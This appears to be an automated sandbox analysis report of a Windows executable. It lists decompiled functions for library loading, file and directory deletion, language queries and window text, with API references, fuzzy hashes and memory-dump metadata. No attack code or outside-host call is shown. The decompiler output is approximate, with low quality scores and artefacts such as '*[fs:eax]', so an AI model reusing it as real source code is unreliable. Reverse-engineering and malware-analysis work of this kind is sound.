                                                            0x0040e9a9
                                                            0x0040e9ac
                                                            0x0040e9b3
                                                            0x0040e9b3
                                                            0x0040e958
                                                            0x0040e960
                                                            0x0040e960
                                                            0x00000000
                                                            0x0040e956
                                                            0x0040e922
                                                            0x0040e942
                                                            0x0040e943
                                                            0x0040e945
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040e945
                                                            0x0040e931
                                                            0x0040e93b
                                                            0x00000000

                                                            APIs
                                                            • GetUserDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E967
                                                            • GetSystemDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E98F
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: DefaultLanguage$SystemUser
                                                            • String ID:
                                                            • API String ID: 384301227-0
                                                            • Opcode ID: 71c01383dce129321d42375a4320665508c6a8894fd0ab1ecb023abfc2bbde49
                                                            • Instruction ID: f222509f0094d30d647024d0898a7a2300edb3e6cc60590d57b3240daf1099d8
                                                            • Opcode Fuzzy Hash: 71c01383dce129321d42375a4320665508c6a8894fd0ab1ecb023abfc2bbde49
                                                            • Instruction Fuzzy Hash: F1312170A002199FDB10EB9AC881BAEB7B5EF44308F50497BE400B73D1D7789D558B59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00414020, Relevance: 3.1, APIs: 2, Instructions: 57libraryloaderCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 65%
                                                            			E00414020(void* __ebx, void* __esi, struct HINSTANCE__* _a4, CHAR* _a8) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _t22;
				CHAR* _t31;
				intOrPtr _t38;
				intOrPtr _t39;
				struct HINSTANCE__* _t41;
				void* _t43;
				void* _t44;
				intOrPtr _t45;

				_t43 = _t44;
				_t45 = _t44 + 0xfffffff8;
				_v8 = 0;
				_t31 = _a8;
				_t41 = _a4;
				_push(_t43);
				_push(0x4140be);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45;
				if(_t31 >> 0x10 != 0) {
					_push(_t43);
					 *[fs:eax] = _t45;
					E0040A1EC( &_v8);
					E0040A944( &_v8, 0, _t31,  *[fs:eax]);
					_t22 = GetProcAddress(_t41, E0040AC70(_v8)); // executed
					_v12 = _t22;
					_t38 = 0x4140a1;
					 *[fs:eax] = _t38;
					_push(E004140A8);
					return E0040A1EC( &_v8);
				} else {
					_v12 = GetProcAddress(_t41, _t31);
					_pop(_t39);
					 *[fs:eax] = _t39;
					_push(E004140C5);
					return E0040A1EC( &_v8);
				}
			}













                                                            0x00414021
                                                            0x00414023
                                                            0x0041402a
                                                            0x0041402d
                                                            0x00414030
                                                            0x00414035
                                                            0x00414036
                                                            0x0041403b
                                                            0x0041403e
                                                            0x00414046
                                                            0x00414056
                                                            0x0041405f
                                                            0x00414065
                                                            0x00414074
                                                            0x00414083
                                                            0x00414088
                                                            0x0041408d
                                                            0x00414090
                                                            0x00414093
                                                            0x004140a0
                                                            0x00414048
                                                            0x0041404f
                                                            0x004140aa
                                                            0x004140ad
                                                            0x004140b0
                                                            0x004140bd
                                                            0x004140bd

                                                            APIs
                                                            • GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00414083
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: 87bbede48919e2c320656d28165f2dd41f3e4cb1cd8a5dac7222dfe60dbaf93b
                                                            • Instruction ID: b41df1fa75d381eed13266955d9feb05bf3a80cdd3b44aa66b38c7297c5ee5d6
                                                            • Opcode Fuzzy Hash: 87bbede48919e2c320656d28165f2dd41f3e4cb1cd8a5dac7222dfe60dbaf93b
                                                            • Instruction Fuzzy Hash: 3C11C631604208AFD701DF22CC529AD7BECEB8E714BA2047AF904E3680DB385F549599
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040E9E0, Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 58%
                                                            			E0040E9E0(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				short _v530;
				char _v536;
				char _v540;
				void* _t44;
				intOrPtr _t45;
				void* _t49;
				void* _t52;

				_v536 = 0;
				_v540 = 0;
				_v8 = 0;
				_t49 = __eax;
				_push(_t52);
				_push(0x40ea9a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t52 + 0xfffffde8;
				GetModuleFileNameW(0,  &_v530, 0x105);
				E0040B2DC( &_v536, _t49);
				_push(_v536);
				E0040B318( &_v540, 0x105,  &_v530);
				_pop(_t44); // executed
				E0040E8BC(_v540, 0,  &_v8, _t44, __edi, _t49); // executed
				if(_v8 != 0) {
					LoadLibraryExW(E0040B278(_v8), 0, 2);
				}
				_pop(_t45);
				 *[fs:eax] = _t45;
				_push(E0040EAA1);
				E0040A228( &_v540, 2);
				return E0040A1C8( &_v8);
			}











                                                            0x0040e9ed
                                                            0x0040e9f3
                                                            0x0040e9f9
                                                            0x0040e9fc
                                                            0x0040ea00
                                                            0x0040ea01
                                                            0x0040ea06
                                                            0x0040ea09
                                                            0x0040ea1c
                                                            0x0040ea29
                                                            0x0040ea34
                                                            0x0040ea46
                                                            0x0040ea54
                                                            0x0040ea55
                                                            0x0040ea5e
                                                            0x0040ea6d
                                                            0x0040ea72
                                                            0x0040ea76
                                                            0x0040ea79
                                                            0x0040ea7c
                                                            0x0040ea8c
                                                            0x0040ea99

                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileLibraryLoadModuleName
                                                            • String ID:
                                                            • API String ID: 1159719554-0
                                                            • Opcode ID: d8f8903bb8f55f7d45334c9080d72fcc7eb242fea3614e091d73e0bd29641f10
                                                            • Instruction ID: bfcf378974dcce41ca09e2914a43810c414f47049a433e9fa093b73340916525
                                                            • Opcode Fuzzy Hash: d8f8903bb8f55f7d45334c9080d72fcc7eb242fea3614e091d73e0bd29641f10
                                                            • Instruction Fuzzy Hash: 46114270A4021CABDB10EB61DC86BDE73B8EB18304F5145FEA508B72D1DB785E848E99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0062CFB8, Relevance: 3.1, APIs: 2, Instructions: 52comCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 48%
                                                            			E0062CFB8(void* __ebx) {
				void* _v8;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr* _t22;
				intOrPtr* _t25;
				intOrPtr _t34;
				intOrPtr _t38;

				_push(0);
				_push(_t38);
				_push(0x62d04e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t38;
				if( *0x6d63b4 != 0) {
					L6:
					_pop(_t34);
					 *[fs:eax] = _t34;
					_push(E0062D055);
					return E0040EC28( &_v8);
				}
				if(GetVersion() >= 0x601) {
					_push(E0040EC28( &_v8));
					_t20 =  *0x6ce1cc; // 0x6cd0d4
					_push(_t20);
					_push(1);
					_push(0);
					_t21 =  *0x6cdad4; // 0x6cd0c4
					_push(_t21); // executed
					L0043C1EC(); // executed
					if(_t21 == 0) {
						_t22 = _v8;
						_push(_t22);
						if( *((intOrPtr*)( *_t22 + 0xc))() == 0) {
							_t25 = _v8;
							 *((intOrPtr*)( *_t25 + 4))(_t25);
							E0040EC40(0x6d63b8, _v8);
						}
					}
				}
				 *0x6d63b4 = 1;
				goto L6;
			}










                                                            0x0062cfbb
                                                            0x0062cfc0
                                                            0x0062cfc1
                                                            0x0062cfc6
                                                            0x0062cfc9
                                                            0x0062cfd3
                                                            0x0062d02e
                                                            0x0062d03a
                                                            0x0062d03d
                                                            0x0062d040
                                                            0x0062d04d
                                                            0x0062d04d
                                                            0x0062cfe0
                                                            0x0062cfea
                                                            0x0062cfeb
                                                            0x0062cff0
                                                            0x0062cff1
                                                            0x0062cff3
                                                            0x0062cff5
                                                            0x0062cffa
                                                            0x0062cffb
                                                            0x0062d002
                                                            0x0062d004
                                                            0x0062d007
                                                            0x0062d00f
                                                            0x0062d011
                                                            0x0062d017
                                                            0x0062d022
                                                            0x0062d022
                                                            0x0062d00f
                                                            0x0062d002
                                                            0x0062d027
                                                            0x00000000

                                                            APIs
                                                            • GetVersion.KERNEL32(00000000,0062D04E,?,00000000,00000000,?,0062D064,?,0068E013), ref: 0062CFD5
                                                            • CoCreateInstance.OLE32(006CD0C4,00000000,00000001,006CD0D4,00000000,00000000,0062D04E,?,00000000,00000000,?,0062D064,?,0068E013), ref: 0062CFFB
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CreateInstanceVersion
                                                            • String ID:
                                                            • API String ID: 1462612201-0
                                                            • Opcode ID: cbb049565a1867f24a50483da30d8e7f142d0e73d3a7e9700637a94f81e4e663
                                                            • Instruction ID: 9475dfad4fa877b1df6a840545b6a6068a8d92e7f1f871649489f85859f50de3
                                                            • Opcode Fuzzy Hash: cbb049565a1867f24a50483da30d8e7f142d0e73d3a7e9700637a94f81e4e663
                                                            • Instruction Fuzzy Hash: F511D231648A04AFEB10EF69ED4AF5A77EEEB45308F4214BAF400D7AA1C775AD10CB15
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005ABB4C, Relevance: 3.0, APIs: 2, Instructions: 50threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 69%
                                                            			E005ABB4C(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _t12;
				intOrPtr _t16;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				void* _t30;
				void* _t31;
				intOrPtr _t32;

				_t30 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_t23 =  *0x6ccbac; // 0x0
				_v12 = _t23;
				_t24 =  *0x6ccbbc; // 0x0
				_v16 = _t24;
				 *0x6ccbac = __eax;
				 *0x6ccbbc = 0;
				_push(_t30);
				_push(0x5abbf9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				 *0x6ccbb8 = 1;
				_push(_t30);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				EnumThreadWindows(GetCurrentThreadId(), 0x5abafc, 0);
				_t12 =  *0x6ccbbc; // 0x0
				_v8 = _t12;
				_pop(_t25);
				 *[fs:eax] = _t25;
				_t26 = 0x5abbbb;
				 *[fs:eax] = _t26;
				_push(E005ABC00);
				 *0x6ccbb8 = 0;
				 *0x6ccbbc = _v16;
				_t16 = _v12;
				 *0x6ccbac = _t16;
				return _t16;
			}















                                                            0x005abb4d
                                                            0x005abb4f
                                                            0x005abb55
                                                            0x005abb5b
                                                            0x005abb5e
                                                            0x005abb64
                                                            0x005abb67
                                                            0x005abb6e
                                                            0x005abb7a
                                                            0x005abb7b
                                                            0x005abb80
                                                            0x005abb83
                                                            0x005abb86
                                                            0x005abb8f
                                                            0x005abb95
                                                            0x005abb98
                                                            0x005abba4
                                                            0x005abba9
                                                            0x005abbae
                                                            0x005abbb3
                                                            0x005abbb6
                                                            0x005abbd6
                                                            0x005abbd9
                                                            0x005abbdc
                                                            0x005abbe1
                                                            0x005abbeb
                                                            0x005abbf0
                                                            0x005abbf3
                                                            0x005abbf8

                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 005ABB9E
                                                            • EnumThreadWindows.USER32(00000000,005ABAFC,00000000), ref: 005ABBA4
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Thread$CurrentEnumWindows
                                                            • String ID:
                                                            • API String ID: 2396873506-0
                                                            • Opcode ID: 50b1606a0afe4943f6b819d05498a248b249cba9426d36aa2a532158776b3fde
                                                            • Instruction ID: ee6e8008b641080cd7585ababab2aba3c455f5a37fbde39c0718e37cfc8f8a06
                                                            • Opcode Fuzzy Hash: 50b1606a0afe4943f6b819d05498a248b249cba9426d36aa2a532158776b3fde
                                                            • Instruction Fuzzy Hash: C5112574A08744AFD711CF66DCA2D6ABFE9E74A720F1194AAE804D3791E7756C00CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0060C158, Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 60%
                                                            			E0060C158(void* __eax, void* __edx, void* __eflags) {
				int _v8;
				char _v16;
				long _v20;
				int _t13;
				intOrPtr _t27;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff0;
				if(E0060BF74(__eax,  &_v16) != 0) {
					_push(_t32);
					_push(0x60c1b5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t35;
					_t13 = DeleteFileW(E0040B278(__edx)); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E0060C1BC);
					return E0060BFB0( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}











                                                            0x0060c159
                                                            0x0060c15b
                                                            0x0060c170
                                                            0x0060c17b
                                                            0x0060c17c
                                                            0x0060c181
                                                            0x0060c184
                                                            0x0060c18f
                                                            0x0060c194
                                                            0x0060c19c
                                                            0x0060c1a1
                                                            0x0060c1a4
                                                            0x0060c1a7
                                                            0x0060c1b4
                                                            0x0060c172
                                                            0x0060c174
                                                            0x0060c1cd
                                                            0x0060c1cd

                                                            APIs
                                                            • DeleteFileW.KERNEL32(00000000,00000000,0060C1B5,?,?,?), ref: 0060C18F
                                                            • GetLastError.KERNEL32(00000000,00000000,0060C1B5,?,?,?), ref: 0060C197
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 2018770650-0
                                                            • Opcode ID: 3697c3af58fd59330cb1976570848beae36e068bde04d4d9265381b0fddbc49e
                                                            • Instruction ID: 318e45fb2803f7fcaacad33ae20e8141f5d943eca3b4fb5a26b9ca9ca2c048f0
                                                            • Opcode Fuzzy Hash: 3697c3af58fd59330cb1976570848beae36e068bde04d4d9265381b0fddbc49e
                                                            • Instruction Fuzzy Hash: 9EF0C831A44308ABCB04DFB59C4149FB7E9DB0932075147FAF804D3382E7745E005994
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0060C664, Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 60%
                                                            			E0060C664(void* __eax, void* __edx, void* __eflags) {
				int _v8;
				char _v16;
				long _v20;
				int _t13;
				intOrPtr _t27;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff0;
				if(E0060BF74(__eax,  &_v16) != 0) {
					_push(_t32);
					_push(0x60c6c1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t35;
					_t13 = RemoveDirectoryW(E0040B278(__edx)); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E0060C6C8);
					return E0060BFB0( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}











                                                            0x0060c665
                                                            0x0060c667
                                                            0x0060c67c
                                                            0x0060c687
                                                            0x0060c688
                                                            0x0060c68d
                                                            0x0060c690
                                                            0x0060c69b
                                                            0x0060c6a0
                                                            0x0060c6a8
                                                            0x0060c6ad
                                                            0x0060c6b0
                                                            0x0060c6b3
                                                            0x0060c6c0
                                                            0x0060c67e
                                                            0x0060c680
                                                            0x0060c6d9
                                                            0x0060c6d9

                                                            APIs
                                                            • RemoveDirectoryW.KERNEL32(00000000,00000000,0060C6C1,?,?,00000000), ref: 0060C69B
                                                            • GetLastError.KERNEL32(00000000,00000000,0060C6C1,?,?,00000000), ref: 0060C6A3
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: DirectoryErrorLastRemove
                                                            • String ID:
                                                            • API String ID: 377330604-0
                                                            • Opcode ID: 53d77f0b7f1706873743be23e773c9934c7890b647961f754ec8971419ba3f02
                                                            • Instruction ID: 4dcda24c2f25390586e6dcbd063c7cff493c698b67123ab594910c5e431ffc76
                                                            • Opcode Fuzzy Hash: 53d77f0b7f1706873743be23e773c9934c7890b647961f754ec8971419ba3f02
                                                            • Instruction Fuzzy Hash: 86F0C231A94208ABDB14DFB5AC418AFB3E9DB493207514BBAF804E3281EB755E105698
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0042B848, Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 37%
                                                            			E0042B848(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				struct HINSTANCE__* _t9;
				void* _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t18 = _t19;
				_t20 = _t19 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t18);
				_push(0x42b8ba);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				asm("fnstcw word [ebp-0x2]");
				_push(_t18);
				_push(0x42b89c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				_t9 = LoadLibraryW(E0040B278(_t12)); // executed
				_v12 = _t9;
				_pop(_t16);
				 *[fs:eax] = _t16;
				_push(E0042B8A3);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}












                                                            0x0042b849
                                                            0x0042b84b
                                                            0x0042b84f
                                                            0x0042b852
                                                            0x0042b857
                                                            0x0042b85c
                                                            0x0042b85d
                                                            0x0042b862
                                                            0x0042b865
                                                            0x0042b868
                                                            0x0042b86d
                                                            0x0042b86e
                                                            0x0042b873
                                                            0x0042b876
                                                            0x0042b881
                                                            0x0042b886
                                                            0x0042b88b
                                                            0x0042b88e
                                                            0x0042b891
                                                            0x0042b896
                                                            0x0042b898
                                                            0x0042b89b

                                                            APIs
                                                            • SetErrorMode.KERNEL32(00008000,00000000), ref: 0042B852
                                                            • LoadLibraryW.KERNEL32(00000000,00000000,0042B89C,?,00000000,0042B8BA,?,00008000,00000000), ref: 0042B881
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorLibraryLoadMode
                                                            • String ID:
                                                            • API String ID: 2987862817-0
                                                            • Opcode ID: 56c95385e7de28241530f81c1942e7ebc726a3a305286d3cd261ddb2ef16c520
                                                            • Instruction ID: 1e325d9ebe5d0822fb749a998e89c34c252ba1fb5941e6000e67edf6569427d0
                                                            • Opcode Fuzzy Hash: 56c95385e7de28241530f81c1942e7ebc726a3a305286d3cd261ddb2ef16c520
                                                            • Instruction Fuzzy Hash: D6F08270614704BEDB016FB69C5286FBBECEB4AB0079349B6F814A2691E67D581086A8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005B8250, Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E005B8250(void* __eax, void* __edx, void* __eflags) {
				void* _t9;
				void* _t17;
				void* _t22;
				void* _t23;

				_t23 = __eflags;
				_t22 = __edx;
				_t17 = __eax;
				_t9 = E0040B660( *((intOrPtr*)(__eax + 0xa4)), __edx);
				if(_t23 == 0) {
					return _t9;
				}
				if( *((char*)(_t17 + 0xc4)) != 0) {
					if( *((char*)(_t17 + 0xeb)) == 0) {
						SetWindowTextW( *(_t17 + 0x188), E0040B278(__edx));
					} else {
						SetWindowTextW( *(_t17 + 0x188), 0);
					}
				}
				_t6 = _t17 + 0xa4; // 0xa4
				return E0040A5A8(_t6, _t22);
			}







                                                            0x005b8250
                                                            0x005b8253
                                                            0x005b8255
                                                            0x005b825f
                                                            0x005b8264
                                                            0x005b82ac
                                                            0x005b82ac
                                                            0x005b826d
                                                            0x005b8276
                                                            0x005b8297
                                                            0x005b8278
                                                            0x005b8281
                                                            0x005b8281
                                                            0x005b8276
                                                            0x005b829c
                                                            0x00000000

                                                            APIs
                                                            • SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                            • SetWindowTextW.USER32(?,00000000), ref: 005B8297
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
